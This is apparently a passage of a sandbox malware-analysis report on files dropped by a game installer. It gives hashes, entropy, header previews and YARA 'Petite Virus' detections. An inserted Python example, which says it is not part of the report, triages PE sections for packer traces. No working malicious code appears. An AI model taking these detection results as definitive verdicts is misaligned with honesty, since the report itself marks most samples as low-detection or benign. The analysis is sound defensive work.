                                                                            Entropy (8bit):6.191604766067493
                                                                            Encrypted:false
                                                                            SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                            MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                            SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                            SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                            SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):266254
                                                                            Entropy (8bit):6.343813822604148
                                                                            Encrypted:false
                                                                            SSDEEP:3072:F2JQNvPZGde1lxIrPYi/vNN0ZCS+lLLytmEwKuwKwvfNXOndQvmjmkVfte2t6l:FdlP8WUTY0hlL2KqfNamvmjFXe2g
                                                                            MD5:8B099FA7B51A8462683BD6FF5224A2DC
                                                                            SHA1:C3AA74FFF8BB1EC4034DA2D48F0D9E18E490EA3D
                                                                            SHA-256:438DE563DB40C8E0906665249ECF0BDD466092C9A309C910F5DE8599FB0B83D2
                                                                            SHA-512:9B81093F0853919BCE3883C94C2C0921A96A95604FD2C2A45B29801A9BA898BD04AA17290095994DB50CBFFCBBD6C54519851FF813C63CD9BA132AE9C6EFA572
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........J...................................................\....@... ......................P.......`..................................L............................u.......................c...............................text...t...........................`..`.data...............................@....rdata..(...........................@..@/4......t`.......b...r..............@..@.bss.....I...............................edata.......P......................@..@.idata.......`......................@....CRT....,...........................@....tls................................@....rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):8456
                                                                            Entropy (8bit):6.767152008521429
                                                                            Encrypted:false
                                                                            SSDEEP:192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
                                                                            MD5:19E08B7F7B379A9D1F370E2B5CC622BD
                                                                            SHA1:3E2D2767459A92B557380C5796190DB15EC8A6EA
                                                                            SHA-256:AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
                                                                            SHA-512:564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
                                                                            Malicious:false
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-FJ939.tmp, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':*;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..*L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...|.
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):852754
                                                                            Entropy (8bit):6.503318968423685
                                                                            Encrypted:false
                                                                            SSDEEP:12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
                                                                            MD5:07FB6D31F37FB1B4164BEF301306C288
                                                                            SHA1:4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
                                                                            SHA-256:06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
                                                                            SHA-512:CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):967168
                                                                            Entropy (8bit):6.500850562754145
                                                                            Encrypted:false
                                                                            SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                            MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                            SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                            SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                            SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):127669
                                                                            Entropy (8bit):7.952352167575405
                                                                            Encrypted:false
                                                                            SSDEEP:3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
                                                                            MD5:75C1D7A3BDF1A309C540B998901A35A7
                                                                            SHA1:B06FEEAC73D496C435C66B9B7FF7514CBE768D84
                                                                            SHA-256:6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
                                                                            SHA-512:8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
                                                                            Malicious:false
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-HASL7.tmp, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):36752
                                                                            Entropy (8bit):7.780431937344781
                                                                            Encrypted:false
                                                                            SSDEEP:768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
                                                                            MD5:9FF783BB73F8868FA6599CDE65ED21D7
                                                                            SHA1:F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
                                                                            SHA-256:E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
                                                                            SHA-512:C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p....*.X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(*..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..|....J
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:Unicode text, UTF-8 text
                                                                            Category:dropped
                                                                            Size (bytes):1059
                                                                            Entropy (8bit):5.1208137218866945
                                                                            Encrypted:false
                                                                            SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                            MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                            SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                            SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                            SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                            Malicious:false
                                                                            Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):11532
                                                                            Entropy (8bit):7.219753259626605
                                                                            Encrypted:false
                                                                            SSDEEP:192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
                                                                            MD5:073F34B193F0831B3DD86313D74F1D2A
                                                                            SHA1:3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
                                                                            SHA-256:C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
                                                                            SHA-512:EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
                                                                            Malicious:false
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-IG6J1.tmp, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite...............*..............`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\..*.S...s..$..........o..y..........,.........-..X.....v.M1..*'...5R.4..8k!..q.=*BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk*...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z.*.).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):34392
                                                                            Entropy (8bit):7.81689943223162
                                                                            Encrypted:false
                                                                            SSDEEP:768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
                                                                            MD5:EA245B00B9D27EF2BD96548A50A9CC2C
                                                                            SHA1:8463FDCDD5CED10C519EE0B406408AE55368E094
                                                                            SHA-256:4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
                                                                            SHA-512:EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................
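Two traits recur across the dropped DLLs listed above and can be reproduced straight from the file bytes: the previews of the entries that hit JoeSecurity_PetiteVirus contain a section named "petite", the name the Petite executable packer gives its stub section, and the previews of the MinGW-built DLLs contain sections named "/4", "/19", "/31" and so on, which are COFF string-table references for long section names rather than genuinely nameless sections. A packer stub on its own says a file is packed, not that it is malicious, which is consistent with the 0-3% ReversingLabs ratios on those entries; what matters is what unpacks. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it builds a small constructed PE32 image with one section of each kind, parses the section table, computes the same per-file fields the report shows (size, MD5, SHA1, SHA-256, 8-bit entropy; ssdeep is omitted because it needs the ssdeep library), and flags the per-section observations an analyst looks for. The constructed image, the section data, the 7.0 entropy threshold and all function names are assumptions for illustration.

```python
import hashlib
import math
import re
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (same scale as the report's Entropy field)."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """DOS header -> PE signature -> COFF header -> section table; one dict per section."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, _ts, _symptr, _nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size  # section headers follow the optional header
    sections = []
    for i in range(nsections):
        (raw_name, _vsize, vaddr, raw_size, raw_ptr,
         _reloc, _lines, _nreloc, _nlines, chars) = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        name = raw_name.rstrip(b"\0").decode("latin-1")
        data = pe[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name, "virtual_address": vaddr, "raw_size": raw_size,
                         "characteristics": chars, "entropy": shannon_entropy(data)})
    return sections


def triage_section(sec: dict) -> list:
    """Observations for one section (the entropy threshold is an assumption for illustration)."""
    notes = []
    if re.fullmatch(r"/\d+", sec["name"]):
        notes.append("long-name reference into the COFF string table (GCC/MinGW style); some tools report it as nameless")
    if "petite" in sec["name"].lower():
        notes.append("section name used by the Petite packer stub")
    if sec["characteristics"] & IMAGE_SCN_MEM_EXECUTE and sec["characteristics"] & IMAGE_SCN_MEM_WRITE:
        notes.append("writable and executable: unpacking stub or self-modifying code")
    if sec["entropy"] > 7.0:
        notes.append("high entropy: packed, compressed or encrypted content")
    return notes


def summarize(pe: bytes) -> dict:
    """Reproduce the report's per-file fields plus per-section triage."""
    return {
        "size": len(pe),
        "md5": hashlib.md5(pe).hexdigest().upper(),
        "sha1": hashlib.sha1(pe).hexdigest().upper(),
        "sha256": hashlib.sha256(pe).hexdigest().upper(),
        "entropy": shannon_entropy(pe),
        "sections": [dict(s, notes=triage_section(s)) for s in parse_sections(pe)],
    }


def build_sample_pe(sections) -> bytes:
    """Construct a minimal PE32 DLL image (constructed test input, not a real dropped file)."""
    nsec = len(sections)
    header_len = 0x40 + 4 + 20 + 0xE0 + 40 * nsec
    raw_ptr = (header_len + 0x1FF) & ~0x1FF  # first section on a 512-byte file boundary
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, nsec, 0, 0, 0, 0xE0, 0x2102)  # i386, executable image, 32-bit, DLL
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic; remaining optional-header fields left zero
    headers, blobs, vaddr = b"", b"", 0x1000
    for name, data, chars in sections:
        raw_size = (len(data) + 0x1FF) & ~0x1FF
        headers += struct.pack("<8sIIIIIIHHI", name.encode("ascii").ljust(8, b"\0"),
                               len(data), vaddr, raw_size, raw_ptr + len(blobs), 0, 0, 0, 0, chars)
        blobs += data.ljust(raw_size, b"\0")
        vaddr += (raw_size + 0xFFF) & ~0xFFF
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + headers
    return image.ljust(raw_ptr, b"\0") + blobs


def sample_image() -> bytes:
    """Constructed image with the three section kinds seen in the dropped DLLs above."""
    code = b"\x90" * 256 + b"\xc3" * 256  # two-symbol alphabet: entropy exactly 1.0
    text = (b"hello world\n" * 43)[:512]
    packed = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))  # 4096 pseudo-random bytes
    return build_sample_pe([
        (".text", code, 0x60000020),     # CODE | EXECUTE | READ
        ("/4", text, 0x40000040),        # INITIALIZED_DATA | READ: string-table long name
        ("petite", packed, 0xE0000020),  # CODE | EXECUTE | READ | WRITE: packer stub
    ])


if __name__ == "__main__":
    report = summarize(sample_image())
    print(f"size={report['size']} entropy={report['entropy']:.3f} sha256={report['sha256']}")
    for sec in report["sections"]:
        print(f"{sec['name']:<8} rva=0x{sec['virtual_address']:x} entropy={sec['entropy']:.3f} {sec['notes']}")
```

Run against a real dropped file by replacing `sample_image()` with the file's bytes; the hashes then match the MD5/SHA1/SHA-256 fields above, and the "petite" and "/N" notes appear on exactly the entries whose previews show those section names.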
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):18966
                                                                            Entropy (8bit):7.620111275837424
                                                                            Encrypted:false
                                                                            SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
                                                                            MD5:F0F973781B6A66ADF354B04A36C5E944
                                                                            SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
                                                                            SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
                                                                            SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-KCF1P.tmp, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):115712
                                                                            Entropy (8bit):6.401537154757194
                                                                            Encrypted:false
                                                                            SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                            MD5:840D631DA54C308B23590AD6366EBA77
                                                                            SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                            SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                            SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):26526
                                                                            Entropy (8bit):4.600837395607617
                                                                            Encrypted:false
                                                                            SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                            MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                            SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                            SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                            SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                            Malicious:false
                                                                            Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):197120
                                                                            Entropy (8bit):6.423554884287906
                                                                            Encrypted:false
                                                                            SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                            MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                            SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                            SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                            SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):62478
                                                                            Entropy (8bit):6.063363187934607
                                                                            Encrypted:false
                                                                            SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                            MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                            SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                            SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
